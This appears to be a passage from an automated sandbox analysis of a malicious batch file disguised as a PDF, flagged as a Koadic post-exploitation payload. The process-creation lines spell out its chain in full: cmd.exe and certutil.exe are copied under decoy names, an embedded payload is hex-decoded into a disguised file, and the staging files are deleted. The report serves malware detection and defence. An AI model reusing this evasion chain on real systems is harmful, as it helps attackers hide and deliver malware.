Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD484A3010_2_00007FF7CD484A30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD49422410_2_00007FF7CD494224
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48222010_2_00007FF7CD482220
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48D25010_2_00007FF7CD48D250
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD489E5010_2_00007FF7CD489E50
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48765010_2_00007FF7CD487650
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48524010_2_00007FF7CD485240
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD486EE410_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4A7F0010_2_00007FF7CD4A7F00
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD487D3010_2_00007FF7CD487D30
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4B153810_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48CE1010_2_00007FF7CD48CE10
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4AD9D010_2_00007FF7CD4AD9D0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4881D410_2_00007FF7CD4881D4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48188410_2_00007FF7CD481884
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD482C4810_2_00007FF7CD482C48
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4AAC4C10_2_00007FF7CD4AAC4C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48B0D810_2_00007FF7CD48B0D8
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48851010_2_00007FF7CD488510
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4918D410_2_00007FF7CD4918D4
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD485B7010_2_00007FF7CD485B70
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD483F9010_2_00007FF7CD483F90
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD48372C10_2_00007FF7CD48372C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD489B5010_2_00007FF7CD489B50
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD486BE010_2_00007FF7CD486BE0
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD4AAFBC10_2_00007FF7CD4AAFBC
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48AA5411_2_00007FF7CD48AA54
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD49555411_2_00007FF7CD495554
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD488DF811_2_00007FF7CD488DF8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD49785411_2_00007FF7CD497854
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4937D811_2_00007FF7CD4937D8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48341011_2_00007FF7CD483410
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD490A6C11_2_00007FF7CD490A6C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4AEE8811_2_00007FF7CD4AEE88
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48E68011_2_00007FF7CD48E680
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4AAA3011_2_00007FF7CD4AAA30
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD484A3011_2_00007FF7CD484A30
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD49422411_2_00007FF7CD494224
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48222011_2_00007FF7CD482220
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48D25011_2_00007FF7CD48D250
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD489E5011_2_00007FF7CD489E50
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48765011_2_00007FF7CD487650
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48524011_2_00007FF7CD485240
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD486EE411_2_00007FF7CD486EE4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4A7F0011_2_00007FF7CD4A7F00
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD487D3011_2_00007FF7CD487D30
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4B153811_2_00007FF7CD4B1538
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48CE1011_2_00007FF7CD48CE10
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4AD9D011_2_00007FF7CD4AD9D0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4881D411_2_00007FF7CD4881D4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48188411_2_00007FF7CD481884
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD482C4811_2_00007FF7CD482C48
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4AAC4C11_2_00007FF7CD4AAC4C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48B0D811_2_00007FF7CD48B0D8
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48851011_2_00007FF7CD488510
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4918D411_2_00007FF7CD4918D4
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD485B7011_2_00007FF7CD485B70
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD483F9011_2_00007FF7CD483F90
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD48372C11_2_00007FF7CD48372C
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD489B5011_2_00007FF7CD489B50
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD486BE011_2_00007FF7CD486BE0
Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7CD4AAFBC11_2_00007FF7CD4AAFBC
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7CD493448 appears 72 times
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7CD49081C appears 36 times
Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7CD49498C appears 40 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA2A7D70 appears 35 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA2F64A6 appears 173 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA2A7BAC appears 34 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA29ABFC appears 818 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA27EB98 appears 93 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA21BC9C appears 280 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA2EF1B8 appears 183 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA2EF11C appears 37 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA2A0D10 appears 181 times
Source: C:\Users\Public\kn.exeCode function: String function: 00007FF6AA1ED1C8 appears 41 times
Source: 1x40 CONTAINER.PDF-.bat, type: SAMPLEMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
Source: classification engineClassification label: mal76.bank.evad.winBAT@20/8@0/0
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4832B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,4_2_00007FF7CD4832B0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle,7_2_00007FF6AA2C826C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4AFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,4_2_00007FF7CD4AFB54
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA204B68 SysAllocString,#357,SysAllocString,VariantInit,CoInitializeEx,CoCreateInstance,VariantInit,#357,OpenEventW,GetLastError,#359,OpenEventW,GetLastError,#359,PulseEvent,GetLastError,#357,CloseHandle,CoUninitialize,SysFreeString,SysFreeString,7_2_00007FF6AA204B68
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A6320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,7_2_00007FF6AA2A6320
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
Source: C:\Windows\System32\extrac32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\spoolsv.MPEG" / A / F / Q / S Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\1x40 CONTAINER.PDF-.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 Jump to behavior
Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\spoolsv.MPEG" "C:\\Users\\Public\\Libraries\\spoolsv.COM" 12 Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\extrac32.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptui.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: certca.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: logoncli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\Public\kn.exeSection loaded: uxtheme.dllJump to behavior
Source: 1x40 CONTAINER.PDF-.batStatic file information: File size 3675586 > 1048576
Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1231464310.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1235221791.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1244206775.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1241022537.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1248509185.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1246282305.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1249800313.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1248949309.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1231464310.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1235221791.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1244206775.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1241022537.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1248509185.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1246282305.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1249800313.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1248949309.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1235987323.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1238403569.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1242588067.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1241554853.00007FF6AA2FE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
Source: alpha.exe.3.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
Source: alpha.exe.3.drStatic PE information: section name: .didat
Source: kn.exe.5.drStatic PE information: section name: .didat
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA213668 push rsp; ret 7_2_00007FF6AA213669
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the user root directory
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
Source: C:\Users\Public\alpha.exeAPI coverage: 8.5 %
Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
Source: C:\Users\Public\alpha.exeAPI coverage: 8.7 %
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7CD4A7B4C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF7CD481560
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4835B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF7CD4835B8
Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7CD4A7B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7CD4A7B4C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF6AA2C6F80
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6AA2C10C4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF6AA2C3100
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF6AA2C234C
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA25C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF6AA25C6F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF6AA26DBC0
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF6AA2C19F8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2C1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF6AA2C1B04
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA265E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF6AA265E58
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF6AA26B3D8
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA22D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF6AA22D440
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA26D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF6AA26D4A4
Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6AA2A3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF6AA2A3674
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD49823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF7CD49823C
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD492978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF7CD492978
Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7CD481560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF7CD481560
